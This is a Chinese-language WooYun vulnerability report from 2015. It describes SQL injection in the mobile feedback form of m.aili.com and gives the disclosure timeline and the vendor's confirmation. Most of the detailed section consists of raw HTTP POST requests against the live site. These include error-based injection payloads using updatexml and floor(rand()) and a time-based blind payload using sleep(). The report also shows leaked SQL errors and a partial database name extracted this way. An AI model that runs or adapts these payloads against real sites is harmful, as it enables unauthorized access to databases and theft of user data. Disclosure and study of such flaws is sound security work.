当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098658

漏洞标题:爱丽网某站mysql注入

相关厂商:aili.com

漏洞作者: Forever80s

提交时间:2015-02-28 17:57

修复时间:2015-04-14 17:58

公开时间:2015-04-14 17:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-28: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-14: 细节向公众公开

简要描述:

详细说明:

网站:m.aili.com
info 和emil都存在注入,两个点结合才能利用
首先是报错注入

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 40
Accept-Encoding: gzip, deflate
email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=
HTTP/1.1 200 OK
Date: Fri, 20 Feb 2015 23:50:36 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 shhl147:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1564
System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','')<!DOCTYPE html>
<html>
<head>


两个地方结合闭合括号才能利用,目测是二次注入

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 43
Accept-Encoding: gzip, deflate
email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=a
HTTP/1.1 200 OK
Date: Fri, 27 Feb 2015 13:24:21 GMT
Server: By AILI/3.3
Content-Type: text/html
X-Powered-By: PHP/5.2.14p1
X-Via: 1.1 jsycdx94:9 (Cdn Cache Server V2.0)
Connection: keep-alive
Content-Length: 1566
System Maintenance......<br>Please wait Try.Invalid SQL: INSERT INTO `app_feedback`(`email`,`content`) VALUES ('\','a\')<!DOCTYPE html>
<html>
<head>


构造如下报错注入不能成功

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate
email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,(updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1))%23
这个payload也不行
(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)


暂时只能盲注

POST /setting/feedback/?c=wap&m=setting&a=feedback HTTP/1.1
Referer: http://m.aili.com/setting/feedback/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
X-Forwarded-For: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Host: m.aili.com
Cookie: PHPSESSID=d24b1ad475194aadeb43cb96749ee447
Content-Length: 61
Accept-Encoding: gzip, deflate
email='&dosubmit=%ef%bf%bd%e1%bd%bb&info=,NULL%2bsleep(3))%23


出点数据吧:

database()=neqcmsK*

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-28 18:06

厂商回复:

又被脱裤子了……

最新状态:

暂无